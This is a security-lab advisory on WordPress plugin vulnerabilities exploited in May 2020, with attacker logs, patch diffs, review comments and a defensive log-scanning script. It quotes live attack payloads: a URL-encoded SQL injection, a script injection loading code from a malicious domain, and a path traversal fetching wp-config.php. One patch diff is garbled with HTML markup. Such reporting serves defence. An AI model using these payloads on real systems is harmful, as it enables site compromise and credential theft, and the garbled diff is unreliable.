Relevant Plugins and Vulnerabilities:

Plugin                             Vulnerability                   Patched Version   Installs
WP Product Review                  Unauthenticated Stored XSS      3.7.6             40000
Form Maker by 10Web                Authenticated SQL Injection     ---               100000
Add-on SweetAlert Contact Form 7   Authenticated XSS               1.0.8             20
Paid Memberships Pro               Authenticated SQL Injection     2.3.3             90000
Visual Composer                    Authenticated XSS               27                80000
Team Members                       Authenticated XSS               5.0.4             40000
Photo Gallery by 10Web             Unauthenticated SQL Injection   1.5.55            300000
Login/Signup Popup                 Authenticated XSS               1.5               10000
Easy Testimonials                  Authenticated Stored XSS        3.6               30000
WooCommerce                        Unescaped Metadata              4.1.0             5000000
Page Builder by SiteOrigin         CSRF to XSS                     2.10.16           1000000
Chopslider                         Authenticated SQL Injection     ---               200
Elementor Pro                      Authenticated File Upload       2.9.4             100000
LearnPress                         Privilege Escalation            3.2.6.9           80000
Elementor                          Authenticated Stored XSS        2.9.8             4000000
Avada                              Authenticated Stored XSS        6.2.3             500000
Ninja Forms                        CSRF to Stored XSS              3.4.24.2          1000000
Advanced Order Export For Woo      Authenticated XSS               3.1.4             90000
Quick Page/Post redirect           Authenticated Settings Update   ---               100000
Ultimate Addons for Elementor      Registration Bypass             1.24.2            100000
WTI Like Post                      Authenticated XSS               ---               10000
WP-Advanced-Search                 Authenticated SQL Injection     3.3.7             1000
Gmedia Photo Gallery               Authenticated XSS               1.18.5            10000

Highlights for May 2020

Cross-site scripting is still the most prevalent vulnerability. Bad actors are taking advantage of missing access restrictions on critical functions and of insufficient sanitization of user input.

Unprotected AJAX action bugs are still on the rise. Attackers aren’t hesitating to automate malicious injections for vulnerable plugins.

Attackers have added three plugins and a series of new malicious IPs to their arsenal in an ongoing massive malware campaign targeting WordPress websites with known vulnerabilities.

Details for these highlights can be found under the components listed below.

WP Product Review

Two weeks ago, we reported an unauthenticated stored cross-site scripting vulnerability in WP Product Review, caused by a missing permission check in a REST route definition and improper handling of user input.

Only a few days after the disclosure of this vulnerability, attackers began to scan for vulnerable sites:

181.58.21.65 - - [18/May/2020:17:21:10 +0000] "GET //wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1"
139.198.16.241 - - [18/May/2020:17:15:36 +0000] "GET //wp-content/plugins/wp-product-review/readme.txt HTTP/1.1"
185.162.127.248 - - [17/May/2020:03:38:15 +0000] "GET /wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1"
213.159.210.170 - - [17/May/2020:01:35:04 +0000] "GET /wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1"

Patch (version 3.7.6):

Index : wp - product - review / trunk / includes / gutenberg / class - wppr - gutenberg . php === === === === === === === === === === === === === === === === === === === === === === = -- - a / wp - product - review / trunk / includes / gutenberg / class - wppr - gutenberg . php ++ + b / wp - product - review / trunk / includes / gutenberg / class - wppr - gutenberg . php @@ - 97 , 4 + 97 , 7 @@ ' methods ' = > ' POST ' , ' callback ' = > array ( $this , ' update_review_callback ' ) , + ' permission_callback ' = > function ( ) { + return current_user_can ( ' edit_posts ' ) ; + } , ' args ' = > array ( ' id ' = > array ( -- - Index : wp - product - review / trunk / includes / functions . php === === === === === === === === === === === === === === === === === === === === === === = -- - a / wp - product - review / trunk / includes / functions . php ++ + b / wp - product - review / trunk / includes / functions . php @@ - 229 , 5 + 229 , 5 @@ } ? > - < a title = " <?php echo $review_object->get_name(); ?> " class = " <?php echo $class_a; ?> " href = " <?php echo esc_url( $image_link ); ?> " < ? php echo $lightbox ; ? > rel = " nofollow " target = " _blank " > + < a title = " <?php echo esc_attr( $review_object->get_name() ); ?> " class = " <?php echo $class_a; ?> " href = " <?php echo esc_url( $image_link ); ?> " < ? php echo $lightbox ; ? > rel = " nofollow " target = " _blank " > < img src = " <?php echo esc_attr( $src ); ?> "
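Review bot: in the class-wppr-gutenberg.php hunk, the new permission_callback checks only the broad `edit_posts` capability, so any user with that capability can call update_review_callback for any `id` accepted by the `args` block below it. Since a permission_callback receives the request, consider checking the specific post instead, for example `'permission_callback' => function ( $request ) { return current_user_can( 'edit_post', $request['id'] ); }`, and document in the route definition which roles are expected to update reviews.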
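Review bot: in the functions.php hunk, the title attribute is now wrapped in esc_attr(), but `class="<?php echo $class_a; ?>"` on the same tag is still echoed raw, and `$lightbox` is output unescaped between the attributes. For consistency with the fix, escape `$class_a` with esc_attr() as well and confirm that `$lightbox` is built only from trusted, non-user-controlled values.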

Elementor

Earlier this month, the plugin Elementor Pro fixed an arbitrary file upload vulnerability caused by an unprotected Ajax hook. It wasn’t long before attackers started exploiting this vulnerability.

Our team identified these malicious IPs trying to detect plugin installations for both Elementor Pro and Ultimate Addons for Elementor:

69.164.207.140 - - [08/May/2020:15:59:31 +0000] "GET /wp-content/plugins/elementor-pro/assets/js/preview.min.js HTTP/1.1"
45.79.193.100 - - [08/May/2020:16:49:13 +0000] "GET /wp-content/plugins/ultimate-elementor/assets/css/modules/business-hours.css HTTP/1.1"
62.210.172.66 - - [10/May/2020:02:33:29 +0000] "GET /wp-content/plugins/ultimate-elementor/assets/min-js/uael-registration.min.js HTTP/1.1"
62.210.84.69 - - [13/May/2020:08:13:57 +0000] "GET /wp-content/plugins/elementor-pro/assets/css/frontend.min.css HTTP/1.1"
62.210.172.66 - - [13/May/2020:08:21:05 +0000] "GET /wp-content/plugins/elementor-pro/assets/css/frontend.min.css HTTP/1.1"
[...]

Photo Gallery by 10Web

An unauthenticated SQL Injection was fixed this month in the plugin Photo Gallery.

Patch (version 1.5.55):

Index : photo - gallery / trunk / frontend / models / model . php === === === === === === === === === === === === === === === === === === === === === === = -- - a / photo - gallery / trunk / frontend / models / model . php ++ + b / photo - gallery / trunk / frontend / models / model . php @@ - 197 , 32 + 197 , 32 @@ public function get_alb_gals_row ( $bwg , $id , $albums_per_page , $sort_by , $order_by , $pagination_type = 0 , $from = ' ' ) { - if ( $albums_per_page < 0 ) { + if ( $albums_per_page < 0 ) { $albums_per_page = 0 ; } global $wpdb ; - $order_by = ' ORDER BY </span><span style='color:#02d045; '>'</span> <span style='color:#d2cd86; '>.</span> <span style='color:#d2cd86; '>(</span> <span style='color:#d2cd86; '>(</span><span style='color:#d2cd86; '>!</span>empty<span style='color:#d2cd86; '>(</span>$from<span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>&&</span> $from <span style='color:#d2cd86; '>===</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>widget</span><span style='color:#02d045; '>'</span><span style='color:#d2cd86; '>)</span> <span style='color:#b060b0; '>?</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>id</span><span style='color:#02d045; '>'</span> <span style='color:#b060b0; '>:</span> $sort_by <span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>.</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '> ' . $order_by ; - if ( $sort_by == ' random ' || $sort_by == ' RAND() ' ) { - $order_by = ' ORDER BY RAND() ' ; - } - $search_where = ' ' ; - $search_value = trim ( WDWLibrary : : get ( ' bwg_search_ ' . $bwg ) ) ; - if ( ! 
empty ( $search_value ) ) { - $search_keys = explode ( ' ' , $search_value ) ; + $order_by = ' ORDER BY </span><span style='color:#02d045; '>'</span> <span style='color:#d2cd86; '>.</span> <span style='color:#d2cd86; '>(</span> <span style='color:#d2cd86; '>(</span> <span style='color:#d2cd86; '>!</span>empty<span style='color:#d2cd86; '>(</span> $from <span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>&&</span> $from <span style='color:#d2cd86; '>===</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>widget</span><span style='color:#02d045; '>'</span> <span style='color:#d2cd86; '>)</span> <span style='color:#b060b0; '>?</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>id</span><span style='color:#02d045; '>'</span> <span style='color:#b060b0; '>:</span> $sort_by <span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>.</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '> ' . $order_by ; + if ( $sort_by == ' random ' || $sort_by == ' RAND() ' ) { + $order_by = ' ORDER BY RAND() ' ; + } + $search_where = ' ' ; + $search_value = trim ( WDWLibrary : : get ( ' bwg_search_ ' . $bwg ) ) ; + if ( ! empty ( $search_value ) ) { + $search_keys = explode ( ' ' , $search_value ) ; $alt_search = ' ( ' ; $description_search = ' ( ' ;
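Review bot: the visible part of the model.php hunk removes and re-adds identical lines (`if ( $albums_per_page < 0 ) {`, the `$order_by = 'ORDER BY ' . ... . $order_by;` assignment, the RAND() branch and the `bwg_search_` handling), so as excerpted it shows no change to how `$sort_by` and `$order_by` are concatenated straight into the ORDER BY clause or to how the user-supplied `$search_keys` are used. Either include the lines of this 32-line hunk that actually escape the search terms, or validate `$sort_by` against a whitelist of column names, restrict `$order_by` to ASC/DESC, and pass the search terms through `$wpdb->prepare()` rather than string concatenation.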

Payload Used by Attackers:

185.162.127.248 -- POST -- /wp-admin/admin-ajax.php -- action=bwg_frontend_data&bwg_search_0=1%23+%25DFGDFG%22%29%29%2F%2A%2A%2FUNION%2F%2A%2A%2FALL%2F%2A%2A%2FSELECT%2F%2A%2A%2FTABLE_SCHEMA%2CTABLE_NAME%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2F%2A%2A%2Fas%2F%2A%2A%2Fdummy_3%2F%2A%2A%2Ffrom%2F%2A%2A%2Finformation_schema.tables%23FGDFGDFG%29%29%23&gallery_type=album_compact_preview&type_0=album -- 2020-05-17

Plugin & Theme Payloads Added to Ongoing Campaign

Malicious Domains & Detected IPs

Our team saw the following new malicious domains injected into an ongoing campaign exploiting known WordPress vulnerabilities this month:

css[.]digestcolect[.]com
cls[.]balantfromsun[.]com
count[.]trackstatisticsss[.]com

The following IPs have also been associated with this campaign:

79.133.202.70 154.43.128.23 185.162.127.248 51.83.70.152 213.159.210.170 139.162.28.41 139.99.169.192 185.217.0.224 84.238.108.177 62.210.180.8 [...]

Exploit Attempts Seen in the Wild

Our team identified attacks against the following vulnerable plugins and themes.

Bold Page Builder (From Last Year)


WP Quick Booking Manager (from 4 years ago)

139.162.28.41 - action=gen_save_cssfixfront&css=%3C%2Fstyle%3E%3Cscript+type%3D%27text%2Fjavascript%27+src%3D%27https%3A%2F%2Fcss.digestcolect.com%2Fstm%3Fv%3Dl6.0.0%27%3E%3C%2Fscript%3E%3Cstyle%3E&cssfix=front [12/May/2020:04:52:19 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Duplicator Download

62.210.180.8 - - [14/May/2020:14:45:54 +0000] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.1"
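The log excerpts above share two patterns: requests for static plugin files used to fingerprint installations, and admin-ajax.php calls with the abused action names. The following is an added detection example (not code from these notes or from Sucuri) that parses Apache combined-format lines and flags both patterns; the log lines it runs on are constructed, modelled on the ones quoted here, and the action and plugin lists are assumptions taken from this page.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample access-log lines (Apache combined format), modelled on the
# probes and exploit attempts quoted in these notes; the last line is benign.
SAMPLE_LOG = """\
181.58.21.65 - - [18/May/2020:17:21:10 +0000] "GET //wp-content/plugins/wp-product-review/readme.txt HTTP/1.1" 200 1287
62.210.180.8 - - [14/May/2020:14:45:54 +0000] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.1" 200 512
139.162.28.41 - - [12/May/2020:04:52:19 +0000] "POST /wp-admin/admin-ajax.php?action=bt_bb_set_custom_css HTTP/1.1" 200 11
10.0.0.5 - - [12/May/2020:09:00:00 +0000] "GET /wp-content/uploads/2020/05/photo.jpg HTTP/1.1" 200 8812
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')

# admin-ajax actions that these notes report being abused in the wild (assumed watch list)
SUSPICIOUS_ACTIONS = {"bwg_frontend_data", "bt_bb_set_custom_css",
                      "gen_save_cssfixfront", "duplicator_download"}
# plugin slugs whose static files were requested to fingerprint installations
WATCHED_PLUGINS = {"wp-product-review", "elementor-pro", "ultimate-elementor"}
FINGERPRINT_RE = re.compile(r"^/wp-content/plugins/(?P<slug>[^/]+)/(readme\.txt|assets/)")


def classify(line):
    """Return (ip, reason) when a line matches a known probe or exploit pattern, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m["target"].partition("?")
    path = "/" + path.lstrip("/")  # scanners send //wp-content/... to dodge naive prefix rules
    fp = FINGERPRINT_RE.match(path)
    if fp and fp["slug"] in WATCHED_PLUGINS:
        return m["ip"], f"fingerprint probe for {fp['slug']}"
    if path.endswith("/wp-admin/admin-ajax.php"):
        action = parse_qs(query).get("action", [""])[0]
        if action in SUSPICIOUS_ACTIONS:
            return m["ip"], f"admin-ajax action {action}"
        if "../" in unquote(query):  # e.g. file=../wp-config.php
            return m["ip"], "path traversal in admin-ajax query"
    return None


def scan(log_text):
    """Run classify() over every line and return the hits in log order."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for ip, reason in scan(SAMPLE_LOG):
        print(f"{ip:16} {reason}")
```

Actions sent in a POST body (as in the Photo Gallery payload above) never appear in a standard access log, so matching those needs request-body or firewall logging rather than this script.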

Many other plugins are still under attack and public exploits already exist for all of the components listed above. Please check our previous lab notes for more information about this ongoing WordPress Malware campaign.

To mitigate this threat, we strongly encourage you to keep your software up to date to prevent infection and reduce risk to your environment. Websites behind the Sucuri Firewall are protected against these exploits.